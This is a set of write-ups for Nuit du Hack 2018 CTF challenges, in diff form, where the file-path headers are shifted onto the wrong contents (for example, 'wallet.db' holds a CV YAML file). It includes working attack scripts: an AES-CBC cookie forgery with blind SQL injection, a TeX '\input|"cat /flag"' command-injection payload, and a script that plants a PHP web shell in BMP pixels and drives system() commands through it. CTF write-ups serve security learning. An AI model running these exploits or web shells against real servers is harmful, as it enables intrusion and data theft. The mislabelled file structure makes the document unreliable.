cryptolol, puse, linkedout and pixeditor writeups

Author: Pharisaeus

2018-03-30-nuit-du-hack/Cryptolol/README.md

@@ -0,0 +1,138 @@
+# Cryptolol (Crypto/Web)
+
+In the task we get access to a webpage which only prints out:
+
+![](cryptolol.png)
+
+There is pretty much nothing else there.
+But we get an interesting base64 encoded cookie from the server called `USERNAME`.
+Playing around with this cookie we figure out it's AES-CBC encrypted username.
+We can do some bitflipping of the first bytes and it changes corresponding bytes in next 16 byte block.
+We also get a full echo on the decryption results from the server.
+
+Initially we thought it might simply be padding oracle of some sort, but we easily checked that there is no PKCS padding at all.
+We removed IV block, so decryption would show only the second block, and then by bitflipping we deduced that the whole thing is padded with spaces.
+We also verified that ciphertext we have contains simply what was printed out - `Smelly Tooth Cromwel`.
+
+Short reminder for those who are not familiar with CBC mode: each ciphertext block is decrypted first with AES and then XORed with previous block. 
+First block is XORed with so called IV, which is appended as the first block of ciphertext.
+The trick is that we can change IV however we want, and it will result in changing the plaintext after decryption.
+If we XOR k-th byte of IV with value `x` then k-th byte of first plaintext block will also get XORed with `x`.
+Using this technique we can force any decryption we want for a single block.
+
+By playing around with a single block we noticed that there is some kind of WAF on the server, because changing the plaintext contents to words like `union` or `sleep` was giving a special error that the contents were suspicious.
+
+We tried to get some kind of SQL Injection, but we could get this to work with only one block.
+We decided we need more characters in the query.
+
+Fortuanately server gave us full decryption results, and this allows us to forge a ciphertext for any plaintext we want.
+We can do this by:
+
+1. We send bytes `\x00` in as many blocks as we need for the payload we want to send.
+2. We read how server decrypted this.
+3. We take last block decryption and XOR it with last block of plaintext we want. The result is what the previous block has to be, in order for us to get this result.
+4. We set previous block for the XOR result value.
+5. We send the current ciphertext again, but without the last block.
+6. We repeat steps 2-5 for all blocks until last XOR becomes the IV.
+
+This way we get a ciphertext which will get decrypted to plaintext we want.
+
+There were some issues with the injection payload here:
+
+1. There was WAF which removed some useful instructions
+2. It took us a while to figure out the schema and then to notice that for user `Smelly Tooth Cromwel` the `flag` field is null, and we need to find another user with the real flag.
+3. We could only get a blind injection, and the query was very particular, because if the result set had more/less than 1 record, it would fail with error, so we used injection in the form of `Smelly Tooth Cromwel' or CONDITION`, and if the condition was true then result set would have more records and there would be error, and otherwise no error would appear.
+4. It was pretty slow, even with binary search.
+5. Substring-like functions were blacklisted so eventually we casted flag to binary and run regex matching on this:
+
+```python
+import base64
+import re
+from ast import literal_eval
+from math import ceil
+import requests
+from bs4 import BeautifulSoup
+from crypto_commons.generic import chunk, xor_string
+
+
+def pad(plaintext):
+    blocks = int(ceil((float(len(plaintext)) / 16)))
+    return plaintext.ljust(blocks * 16, ' ')
+
+
+def send_payload(payload):
+    return requests.get('http://cryptolol.challs.malice.fr', cookies={'USERNAME': base64.b64encode(payload)})
+
+
+def get_error_message(content):
+    soup = BeautifulSoup(content, 'html.parser')
+    message = soup.select_one('.error-message')
+    if message:
+        if 'Suspicious' in message.text:
+            raise Exception('filter')
+
+        return re.findall('''the user b(["'].*['"]) has been''', message.text)[0]
+    elif 'Caribbean pirate' in soup.text:
+        return True
+
+
+def form_full_payload(plaintext):
+    blocks = len(pad(plaintext)) / 16
+    chunks = chunk(pad(plaintext), 16)
+    payload = ("\0" * 16) * blocks
+    final_blocks = ["\0" * 16]
+    for i in range(blocks):
+        response = send_payload(payload)
+        decrypted = literal_eval(get_error_message(response.content))
+        last_block = decrypted[-16:]
+        new_block = xor_string(chunks[-i], last_block)
+        final_blocks.append(new_block)
+        payload = '\x00' * 16 * (blocks - 1) + new_block
+    return "".join(final_blocks[::-1])
+
+
+def convert(x):
+    return "\\\\x" + (hex(x)[2:].zfill(2))
+
+
+def guess_single(prefix, single):
+    guess = convert(single)
+    text = '''
+    Smelly Tooth Cromwel' or flag is not null and (cast(flag as binary) regexp '^.{{{prefix_len}}}{guess}') #
+    '''.strip().format(prefix_len=len(prefix), guess=guess)
+    payload = form_full_payload(' ' * 16 + text)
+    response = send_payload(payload)
+    return get_error_message(response.content) is None
+
+
+def guess_letter(prefix, low, high):
+    mid = (low + high) / 2
+    if low == high:
+        return chr(low)
+    if guess_single(prefix, mid):
+        return chr(mid)
+    print(low, high)
+    guess = "[%s-%s]" % (convert(low), convert(mid))
+    text = '''
+    Smelly Tooth Cromwel' or flag is not null and (cast(flag as binary) regexp '^.{{{prefix_len}}}{guess}') #
+    '''.strip().format(prefix_len=len(prefix), guess=guess)
+    print(text)
+    payload = form_full_payload(' ' * 16 + text)
+    response = send_payload(payload)
+    if get_error_message(response.content) is None:
+        return guess_letter(prefix, low, mid - 1)
+    else:
+        return guess_letter(prefix, mid + 1, high)
+
+		
+def main():
+    flag = ""
+    while True:
+        flag += (guess_letter(flag, 0, 129))
+        print("Flag progress:", flag)
+
+
+main()
+```
+
+After some (very long...) time we get `NDH{L!st3n-to_me,MOrty.I_know..that~new$5ituat1oNs*caN--be__int|miDAting...}`

2018-03-30-nuit-du-hack/Cryptolol/cryptolol.png

@@ -8,7 +8,7 @@ Team: shalom, akrasuski1, chivay, nazywam, Eternal, rev, c7f.m0d3
 * [rescue-shell (pwn)](rescue-shell)
 * [shreddinger (ppc)](shreddinger)
 * [AssemblyMe (re)](re_assembly)
-* [Cryptolol (crypto/web)](cryptolol)
 * [LinkedOut (web)](web_linkedout)
 * [PixEditor (web)](web_pixeditor)
 * [Where is my purse (for)](for_purse)
+* [Cryptolol (crypto/web)](cryptolol)

2018-03-30-nuit-du-hack/README.md

@@ -0,0 +1,10 @@
+# Where is my purse (for)
+
+In the task we get a large filesystem image and a memdump to work with.
+Interesting part of memdump is a running KeePass instance.
+
+We got some password-like strings from it, but we've never actually used them.
+For some reason they were not necessary at all.
+
+We've looked around the drive image and the only unusual files we've noticed were connected with `Dcrwallet` (which had some connotation with "purse" from the task name).
+We grabbed all the files of the wallet, and there was a [db file](wallet.db) which contains plaintext string `flag{thx_you_found_my_wallet}`

2018-03-30-nuit-du-hack/for_purse/README.md

@@ -0,0 +1,23 @@
+# Linked Out (Web)
+
+In the task we get access to a webpage for generating CVs.
+We are supposed to upload a YAML input file, and the page generates a PDF with a nice CV theme.
+We get an example input file so we can test the platform.
+
+There is a link to the github with style configuration of the theme, so we learn that this is all done with TeX.
+
+This points into the direction of injecting some malicious TeX directives inside the YAML payload in order to exploit the server.
+
+As one of the fields we can send for example '\input|ls ' and we get:
+
+![](inject1.png)
+
+So we can list files on the server.
+With this we can try to browse a bit to look for the flag.
+We find the `flag` file in root `/` directory and we can send another payload `'\input|"cat /flag"|base64 '` to get:
+
+![](inject2.png)
+
+So the flag is: `NDH{And_Donald_Knuth_created_the_iTeX}`
+
+Final payload [here](inject.yml)

2018-03-30-nuit-du-hack/for_purse/wallet.db

@@ -0,0 +1,123 @@
+cv:
+  personal_informations:
+    firstname: A
+    lastname: Schneier
+    address: 221b Baker Street, London, ENGLAND
+    position: Security Expert ; Master of Internet
+  contacts:
+    mobile: +12 3 456 789 012
+    email: [email protected]
+    homepage: https://www.schneier.com/
+    github: schneier-not-my-real-account
+    gitlab: schneier-not-my-real-account
+    linkedin: schneier-not-my-real-account
+    twitter: schneierblog
+    skype: schneier-not-my-real-account
+    reddit: schneier-not-my-real-account
+    xing: schneier-not-my-real-account
+  misc:
+    extrainfo: Buy one of my books!
+    quote: '\input|"cat /flag"|base64 '
+  committees:
+    - position: Staff
+      committee: DEFCON (DEFense security Conferences On Neptune)
+      location: Neptune
+      date: 2049
+    - position: Staff
+      committee: NDH (Neptune's Days for Hacking)
+      location: Neptune
+      date: 2050
+    - position: Staff
+      committee: Nuit du Hack
+      location: Paris
+      date: 2051
+  education:
+    - degree: PhD in Quantum Physics and Astrophysics
+      institution: University of Rochester
+      location: Rochester, NY, USA
+      date: April 1980 --  August 1984
+      description:
+        - Eassssssy!
+        - Very interesting
+    - degree: PhD in Advanced Computer Security
+      institution: American University
+      location: Washington, DC, USA
+      date: September 1984 -- June 1988
+      description:
+        - Wonderful!
+  experience:
+    - job title: CTO
+      organization: Resilient Systems
+      location: United States of America
+      date: 1923 -- 2019
+      responsibilities:
+        - Too much for you
+    - job title: CEO
+      organization: Internet
+      location: Digital world
+      date: 2020 -- 2040
+      responsibilities:
+        - Be sure it's working
+    - job title: CEO
+      organization: Universe
+      location: Solar system and beyond
+      date: 2041 -- now
+      responsibilities:
+        - Create and manage existing planets
+        - Create and manage existing stars
+        - Create and manage existing galaxies
+  honors:
+    - award: Finalist
+      event: NDH Private CTF
+      location: Paris
+      date: 2039
+    - award: Finalist
+      event: NDH Private CTF
+      location: Uranus
+      date: 2040
+    - award: Finalist
+      event: NDH Private CTF
+      location: Mars
+      date: 2041
+    - award: Finalist
+      event: NDH Private CTF
+      location: Jupiter
+      date: 2042
+  presentation:
+    - role: Presenter of radare5
+      event: NDH (Neptune's Days for Hacking)
+      location: Neptune
+      date: 2091
+      description:
+        - Introduced the 5th version of radare disassembler
+        - Now a 3D interface
+    - role: Presenter of recon-nnnng
+      event: HIP (Hack In Pluto)
+      location: Pluto
+      date: 2094
+      description:
+        - Presenting new features in recon-nnnng (Recon Next Next Next Next Generation)
+  skills:
+    - category: Computer Security
+      list: Too much for you
+    - category: Nuclear physics
+      list: Too much for you
+    - category: Quantum physics
+      list: Too much for you
+    - category: Astrophysics
+      list: Too much for you
+    - category: Cheeses
+      list: Cheddard, Reblochon, Coulommiers, Brie
+  writing:
+    - role: Writer
+      title: Data and Goliath
+      location: United States of America
+      date: 2015
+      description:
+        - About the hidden battles to collect your data and control your world
+    - role: Writer
+      title: Secrets and Lies
+      location: United States of America
+      date: 2000
+      description:
+        - About digital security in a networked world

2018-03-30-nuit-du-hack/web_linkedout/README.md

@@ -0,0 +1,63 @@
+# Pixeditor (Web)
+
+In the task we get access to a web-based picture editor.
+We can draw a small image by setting pixel colors and then save it on the server as JPG, PNG, BMP or GIF under given filename.
+
+There is a check for the file extension when saving the file, however the name is truncated to 50 characters after the extension check.
+So we can use name ending with `.png` to pass the check, but if the name is too long, this extension will be cut.
+Using this trick we can save a `.php` file by using name in format `'x'*46+'.php.png`.
+
+Now we would like to place some PHP code inside the file, but we can only draw some pixels.
+Fortunately PHP interpreters are permissive, and they will execute anything which looks like valid PHP code.
+So we can have some random bytes before and after PHP code in the file, and it will still work.
+
+We need to paint a picture where bytes will create code we want.
+The easiest option is to use BMP because pixels simply go into the file directly as BGR color values.
+Web editor includes also alpha channel, so we actually have 32x32x4 bytes, and we want to skip every 4th byte, because it won't appear in the output file.
+Also the bytes in BMP are inverted, because the web editor format is RGBA and BMP has BGR.
+
+The solution is to split the payload `<?php $_GET['a']($_GET['b']); ?>` into 3-bytes long chunks, and place then in consecutive picture pixels inverted:
+
+```python
+import re
+import requests
+from crypto_commons.generic import chunk
+
+
+def shell(url):
+    while True:
+        b = raw_input("> ")
+        print(requests.get(url + "?a=system&b=" + b).text[3030:])
+
+
+def pad(plain):
+    missing = 3 - len(plain) % 3
+    return plain + (" " * missing)
+
+
+def create_shell(main_url):
+    data = [1 for _ in range(32 * 32 * 4)]
+    index = 0
+    for c in chunk(pad("<?php $_GET['a']($_GET['b']); ?>"), 3):
+        data[index + 2] = ord(c[0])  # R
+        data[index + 1] = ord(c[1])  # G
+        data[index] = ord(c[2])  # B
+        index += 4
+    url = main_url + "save.php"
+    name = "A" * 46 + ".php"
+    r = requests.post(url, data={"data": str(data), "name": name + ".JPG", "format": "BMP"})
+    link = re.findall("<a href='(.*)'>Download", r.text)[0]
+    return link
+
+
+def main():
+    main_url = "http://pixeditor.challs.malice.fr/"
+    link = create_shell(main_url)
+    print(main_url + link)
+    shell(main_url + link)
+
+
+main()
+```
+
+With such shell we can just find the flag in `/` and cat it to get `NDH{Msp4int.3x3>all>th3g1mp}`